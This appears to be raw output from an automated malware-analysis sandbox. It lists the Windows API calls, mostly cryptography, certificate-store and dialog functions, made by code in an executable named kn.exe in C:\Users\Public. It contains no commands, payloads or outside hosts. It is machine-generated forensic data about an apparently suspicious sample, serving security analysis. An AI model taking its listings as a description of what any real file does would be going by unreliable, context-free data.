      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07FE9F0 IsDlgButtonChecked,memset,SendMessageW,LocalFree,GetDlgItemTextW,GetDlgItem,GetDlgItem,EnableWindow,LocalFree,#357,#357,CertFreeCertificateContext,CertFreeCTLContext,GetDlgItem,SendMessageW,SetDlgItemTextW,MessageBoxW,GetDlgItem,SendMessageW,GetDlgItemInt,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,#357,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetDlgItemTextW,SendDlgItemMessageA,CheckDlgButton,GetDlgItem,EnableWindow,SetDlgItemInt,CheckDlgButton,SetDlgItemTextW,SetDlgItemTextW,CertFreeCTLContext,CertFreeCertificateContext,??3@YAXPEAX@Z,memset,SendMessageW,MessageBoxW,memset,CryptUIDlgViewCRLW,memset,CryptUIDlgViewCertificateW,6_2_00007FF7E07FE9F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081AA00 memset,memset,#357,#357,#357,#357,CryptEncodeObjectEx,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,#359,LocalFree,LocalFree,6_2_00007FF7E081AA00
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0838940 BCryptFinishHash,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,6_2_00007FF7E0838940
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E083C940 _CxxThrowException,GetLastError,_CxxThrowException,memmove,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,CryptHashData,#205,GetLastError,#357,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,6_2_00007FF7E083C940
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07BC960 LocalAlloc,CryptGetKeyIdentifierProperty,GetLastError,#357,LocalFree,LocalFree,6_2_00007FF7E07BC960
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0862994 CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,6_2_00007FF7E0862994
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0838AA0 _CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptHashData,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF7E0838AA0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0830ABC BCryptVerifySignature,#205,#357,#357,#357,#357,6_2_00007FF7E0830ABC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0832AE4 CryptAcquireContextW,#205,GetLastError,#359,#357,#359,SetLastError,6_2_00007FF7E0832AE4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07D2B00 BCryptEnumContexts,#360,BCryptQueryContextConfiguration,#360,#357,BCryptFreeBuffer,#357,BCryptEnumContextFunctions,#360,#360,BCryptFreeBuffer,#358,#358,#357,BCryptFreeBuffer,6_2_00007FF7E07D2B00
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0828AFC #357,CertCreateCertificateContext,GetLastError,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,CertSetCTLContextProperty,GetLastError,#357,#357,CertCloseStore,CertFreeCertificateContext,6_2_00007FF7E0828AFC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0814A34 CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptHashCertificate2,CryptEncodeObjectEx,GetLastError,CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,GetLastError,GetLastError,#357,LocalFree,6_2_00007FF7E0814A34
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0830A18 BCryptSetProperty,#205,#359,#357,#357,6_2_00007FF7E0830A18
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0834A1C NCryptIsKeyHandle,_wcsicmp,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,6_2_00007FF7E0834A1C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07A6A84 LocalAlloc,#357,memmove,CryptHashCertificate2,GetLastError,LocalAlloc,#357,memmove,LocalFree,6_2_00007FF7E07A6A84
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0862A78 #357,CryptAcquireCertificatePrivateKey,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,#359,#359,6_2_00007FF7E0862A78
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,6_2_00007FF7E081EA7C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085CBB4 CryptGetProvParam,GetLastError,#358,LocalAlloc,#357,CryptGetProvParam,GetLastError,#357,LocalFree,6_2_00007FF7E085CBB4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07BCB98 NCryptIsKeyHandle,GetLastError,#358,#360,NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#359,LocalFree,NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,CryptGetKeyParam,GetLastError,#359,CryptDestroyKey,NCryptIsKeyHandle,#359,NCryptIsKeyHandle,6_2_00007FF7E07BCB98
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0860B9C CryptHashData,GetLastError,#357,6_2_00007FF7E0860B9C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0832BC0 CryptCreateHash,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF7E0832BC0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0860BF4 CryptDuplicateHash,GetLastError,#357,CryptGetHashParam,GetLastError,#203,CryptDestroyHash,6_2_00007FF7E0860BF4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E089EB38 CryptDecodeObjectEx,GetLastError,??3@YAXPEAX@Z,LocalFree,6_2_00007FF7E089EB38
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0830B80 NCryptCreatePersistedKey,#205,#359,#359,#357,6_2_00007FF7E0830B80
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E083ACAC CryptContextAddRef,CryptDuplicateKey,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,??3@YAXPEAX@Z,6_2_00007FF7E083ACAC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0824CA0 CryptAcquireCertificatePrivateKey,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CryptGetUserKey,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,6_2_00007FF7E0824CA0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F4CC0 #357,lstrcmpW,CryptEnumKeyIdentifierProperties,GetLastError,#357,LocalFree,#357,#359,LocalFree,LocalFree,free,6_2_00007FF7E07F4CC0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0888CF4 GetLastError,#360,CryptGetProvParam,GetLastError,#360,#359,LocalAlloc,CryptGetProvParam,GetLastError,#357,LocalFree,CryptReleaseContext,GetLastError,LocalAlloc,CryptGetProvParam,GetLastError,#358,LocalFree,LocalFree,#357,CryptReleaseContext,LocalFree,6_2_00007FF7E0888CF4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0866CE0 NCryptEnumStorageProviders,#360,6_2_00007FF7E0866CE0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0830D14 NCryptFinalizeKey,#205,#357,#357,6_2_00007FF7E0830D14
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0822CF8 memset,#358,#357,CryptAcquireContextW,GetLastError,#357,#357,#358,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,DeleteFileW,LocalFree,#357,#357,#359,#359,LocalFree,LocalFree,#357,#357,#357,#357,#357,#359,#359,#359,#359,LocalFree,#359,#359,#357,6_2_00007FF7E0822CF8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0832CFC CryptDestroyKey,#205,GetLastError,#357,SetLastError,6_2_00007FF7E0832CFC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07CCC24 CryptDecodeObjectEx,#359,BCryptSetProperty,BCryptGetProperty,#357,BCryptDestroyKey,BCryptCloseAlgorithmProvider,6_2_00007FF7E07CCC24
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0866C30 NCryptOpenStorageProvider,#360,6_2_00007FF7E0866C30
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0830C3C NCryptExportKey,#205,#359,#359,#357,6_2_00007FF7E0830C3C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0796C4C CryptFindOIDInfo,#357,#357,#359,CryptFindOIDInfo,#357,LocalFree,6_2_00007FF7E0796C4C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0868C58 #357,LocalAlloc,#357,memmove,memset,BCryptFreeBuffer,#357,#357,#360,#359,#359,#359,LocalAlloc,memmove,LocalAlloc,memmove,#357,#357,CryptGetDefaultProviderW,LocalAlloc,CryptGetDefaultProviderW,GetLastError,#357,#357,#357,LocalFree,LocalFree,6_2_00007FF7E0868C58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0866C88 NCryptEnumAlgorithms,#360,6_2_00007FF7E0866C88
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0832C80 CryptDestroyHash,#205,GetLastError,#357,SetLastError,6_2_00007FF7E0832C80
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0874C80 CryptAcquireContextW,GetLastError,#357,CryptGenRandom,GetLastError,CryptGenRandom,GetLastError,memset,CryptReleaseContext,6_2_00007FF7E0874C80
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0862DAC #357,#357,CryptFindOIDInfo,LocalFree,6_2_00007FF7E0862DAC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0858DD0 CertGetCRLContextProperty,GetLastError,#357,memcmp,CertGetCRLContextProperty,GetLastError,#357,memcmp,CertFindExtension,GetLastError,memcmp,CryptHashCertificate,GetLastError,memcmp,CryptHashPublicKeyInfo,GetLastError,memcmp,LocalFree,6_2_00007FF7E0858DD0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0830DD4 NCryptGetProperty,#205,#359,#357,#359,#357,6_2_00007FF7E0830DD4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0880DB8 CryptMsgGetParam,GetLastError,#357,#357,memset,CryptMsgGetParam,GetLastError,#357,6_2_00007FF7E0880DB8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0814DDC GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,6_2_00007FF7E0814DDC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0866DE0 NCryptCreatePersistedKey,#360,6_2_00007FF7E0866DE0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0866D2C NCryptFreeBuffer,#360,6_2_00007FF7E0866D2C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F2D18 #359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF7E07F2D18
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0832D78 CryptEncrypt,#205,GetLastError,#357,#357,#357,#357,SetLastError,6_2_00007FF7E0832D78
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0866D78 NCryptOpenKey,#360,6_2_00007FF7E0866D78
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0830D84 NCryptFreeObject,#205,#357,6_2_00007FF7E0830D84
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0866EA8 NCryptImportKey,#360,6_2_00007FF7E0866EA8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0890ED0 LocalAlloc,LocalReAlloc,#357,#360,CryptFindOIDInfo,CryptFindOIDInfo,LocalAlloc,#357,memmove,_wcsnicmp,#256,#359,6_2_00007FF7E0890ED0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0830EF4 NCryptImportKey,#205,#359,#359,#357,6_2_00007FF7E0830EF4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C0E24 #357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,GetLastError,#357,#357,#357,GetLastError,GetLastError,GetLastError,CryptDecodeObject,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF7E07C0E24
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0866E48 NCryptSetProperty,#360,6_2_00007FF7E0866E48
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0832E6C CryptFindOIDInfo,#205,#357,#357,#357,#359,#359,#357,#357,#359,LocalFree,6_2_00007FF7E0832E6C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0874E58 NCryptIsKeyHandle,#357,BCryptGenRandom,#360,LocalAlloc,CryptExportPKCS8,GetLastError,LocalAlloc,CryptExportPKCS8,GetLastError,NCryptIsKeyHandle,#359,#359,NCryptFinalizeKey,#360,6_2_00007FF7E0874E58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085EE94 CryptSignMessage,SetLastError,6_2_00007FF7E085EE94
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0802E7C #223,GetLastError,#358,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,LocalFree,6_2_00007FF7E0802E7C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07D0E94 GetLastError,#359,CryptGetProvParam,LocalFree,#357,LocalFree,CryptReleaseContext,6_2_00007FF7E07D0E94
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0866FAC BCryptOpenAlgorithmProvider,#360,6_2_00007FF7E0866FAC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0830FB4 NCryptOpenKey,#205,#359,#357,#357,6_2_00007FF7E0830FB4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E086700C BCryptEnumAlgorithms,#360,6_2_00007FF7E086700C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0866F2C NCryptExportKey,#360,6_2_00007FF7E0866F2C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C8F1C strcmp,LocalFree,strcmp,LocalFree,strcmp,LocalFree,strcmp,CryptDecodeObject,LocalFree,LocalFree,LocalFree,strcmp,strcmp,strcmp,strcmp,LocalFree,GetLastError,#357,GetLastError,GetLastError,6_2_00007FF7E07C8F1C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0814F50 CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,#357,LocalFree,6_2_00007FF7E0814F50
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085EF74 GetLastError,#357,CryptDecodeObject,GetLastError,GetLastError,GetLastError,LocalAlloc,memmove,LocalFree,LocalFree,LocalFree,6_2_00007FF7E085EF74
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0820F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,6_2_00007FF7E0820F58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C4F90 LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,#357,strcmp,GetLastError,#357,CryptMsgGetAndVerifySigner,CryptVerifyDetachedMessageSignature,GetLastError,#357,CertEnumCertificatesInStore,memcmp,#357,CertFreeCertificateContext,#357,#357,CertFreeCertificateContext,strcmp,#357,CryptMsgControl,GetLastError,#357,#357,#357,#357,6_2_00007FF7E07C4F90
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07FB098 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyCRLTimeValidity,CertCompareCertificateName,CertCompareCertificateName,#357,6_2_00007FF7E07FB098
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E083B0A0 memmove,CryptDecrypt,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,memmove,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF7E083B0A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08670C8 BCryptSetProperty,#360,6_2_00007FF7E08670C8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08310D8 NCryptSetProperty,#205,#359,#357,#359,#357,6_2_00007FF7E08310D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08330D8 CryptGetHashParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,6_2_00007FF7E08330D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0829028 #357,#357,CryptMsgClose,CryptMsgClose,CertCloseStore,LocalFree,6_2_00007FF7E0829028
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07A302F #357,LocalFree,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,6_2_00007FF7E07A302F
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07A7034 #357,CertCreateCertificateContext,#357,CertDuplicateCertificateContext,CertCreateCertificateContext,CertCompareCertificateName,CryptVerifyCertificateSignature,GetLastError,#357,#357,CertFreeCertificateContext,LocalFree,CertFreeCertificateContext,6_2_00007FF7E07A7034
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E083301C CryptGenKey,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF7E083301C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0837020 NCryptDecrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptEncrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF7E0837020
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E086705C BCryptGetProperty,#360,6_2_00007FF7E086705C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0831058 NCryptOpenStorageProvider,#205,#359,#357,6_2_00007FF7E0831058
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07D107C LocalFree,GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,#359,#357,LocalFree,6_2_00007FF7E07D107C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08051A4 #360,#357,#359,#207,CryptFindOIDInfo,#357,GetLastError,#357,#207,#360,#254,#358,LocalFree,LocalFree,LocalFree,6_2_00007FF7E08051A4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08311C8 NCryptVerifySignature,#205,#357,#357,#357,#357,6_2_00007FF7E08311C8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08671C8 BCryptDestroyKey,#360,6_2_00007FF7E08671C8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08331C0 CryptGetKeyParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,6_2_00007FF7E08331C0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0867214 NCryptIsKeyHandle,#357,CryptReleaseContext,GetLastError,6_2_00007FF7E0867214
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0889208 #357,NCryptEnumKeys,#360,#358,6_2_00007FF7E0889208
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,6_2_00007FF7E085511C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07E9134 CryptQueryObject,GetLastError,#357,CertOpenStore,GetLastError,CertOpenStore,GetLastError,CertAddSerializedElementToStore,GetLastError,CertAddEncodedCRLToStore,GetLastError,CertAddEncodedCTLToStore,GetLastError,CertAddEncodedCertificateToStore,GetLastError,#357,CertCloseStore,6_2_00007FF7E07E9134
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0867124 BCryptGenerateKeyPair,#360,6_2_00007FF7E0867124
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081F168 CryptDuplicateKey,GetLastError,#357,CryptEncrypt,GetLastError,CryptEncrypt,GetLastError,CryptDestroyKey,6_2_00007FF7E081F168
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0815164 GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,6_2_00007FF7E0815164
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0813188 CryptAcquireContextW,GetLastError,#359,#359,CryptAcquireContextW,GetLastError,6_2_00007FF7E0813188
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0867178 BCryptCloseAlgorithmProvider,#360,6_2_00007FF7E0867178
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08332A8 CryptGetProvParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,6_2_00007FF7E08332A8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07FB2B4 #357,CryptHashCertificate,GetLastError,#357,memcmp,#358,6_2_00007FF7E07FB2B4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F92C4 memset,CryptHashCertificate,GetLastError,CryptHashCertificate,GetLastError,GetLastError,GetLastError,#357,#254,LocalAlloc,wcsstr,LocalAlloc,LocalAlloc,#357,memmove,GetLastError,GetProcAddress,GetLastError,GetLastError,#359,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FreeLibrary,6_2_00007FF7E07F92C4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08132D0 #359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,6_2_00007FF7E08132D0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E082F2F0 BCryptCreateHash,#205,#357,#357,#357,#357,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF7E082F2F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08092D8 CertEnumCertificatesInStore,CertGetCRLContextProperty,CertSetCTLContextProperty,GetLastError,#357,#357,CertEnumCertificatesInStore,CryptMsgControl,GetLastError,#357,CryptMsgGetAndVerifySigner,GetLastError,#357,CryptMsgGetAndVerifySigner,#357,CertFreeCertificateContext,CertGetCRLContextProperty,CertEnumCertificatesInStore,#357,#357,#207,LocalFree,#357,#357,CertFreeCertificateContext,CompareFileTime,CertFreeCertificateContext,6_2_00007FF7E08092D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07CD304 #357,CryptFindOIDInfo,#359,LocalAlloc,CryptEncodeObjectEx,GetLastError,LocalFree,LocalFree,LocalFree,6_2_00007FF7E07CD304
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081D30C BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,6_2_00007FF7E081D30C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07CD240 #357,CryptFindOIDInfo,#357,LocalFree,6_2_00007FF7E07CD240
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085D28C CryptFindOIDInfo,CryptEnumOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,#358,6_2_00007FF7E085D28C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0867290 NCryptIsKeyHandle,#359,#360,#357,#358,6_2_00007FF7E0867290
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08433B0 CertFindExtension,#357,CryptDecodeObject,GetLastError,#357,#357,6_2_00007FF7E08433B0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E086739C CryptAcquireContextW,GetLastError,#360,#360,SetLastError,6_2_00007FF7E086739C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08133A0 CryptVerifyCertificateSignature,CertCompareCertificateName,6_2_00007FF7E08133A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08693A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,6_2_00007FF7E08693A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08153E8 CryptEncodeObjectEx,GetLastError,#357,6_2_00007FF7E08153E8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,6_2_00007FF7E081B3D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F13F0 CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptHashData,CryptHashData,GetLastError,CryptImportPublicKeyInfo,CryptVerifySignatureW,CertCreateCertificateContext,#357,LocalFree,GetLastError,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,6_2_00007FF7E07F13F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07CB324 CryptDecodeObject,GetLastError,#357,#357,LocalFree,6_2_00007FF7E07CB324
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C7340 GetModuleHandleW,GetProcAddress,GetLastError,BCryptExportKey,#360,LocalAlloc,CryptHashCertificate2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalFree,6_2_00007FF7E07C7340
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F5338 wcsrchr,#357,#357,LocalAlloc,memmove,wcsrchr,GetLastError,#360,#357,#357,LocalFree,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF7E07F5338
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07EB350 CryptFindLocalizedName,CertEnumPhysicalStore,GetLastError,#357,6_2_00007FF7E07EB350
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07BB36C GetLastError,CryptHashCertificate,GetLastError,CryptHashCertificate2,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#357,#357,#357,LocalFree,SysFreeString,6_2_00007FF7E07BB36C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0833390 CryptGetUserKey,#205,GetLastError,#357,#357,SetLastError,6_2_00007FF7E0833390
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085F4A0 CryptHashPublicKeyInfo,SetLastError,6_2_00007FF7E085F4A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E084B4EC CryptDecodeObjectEx,SetLastError,6_2_00007FF7E084B4EC
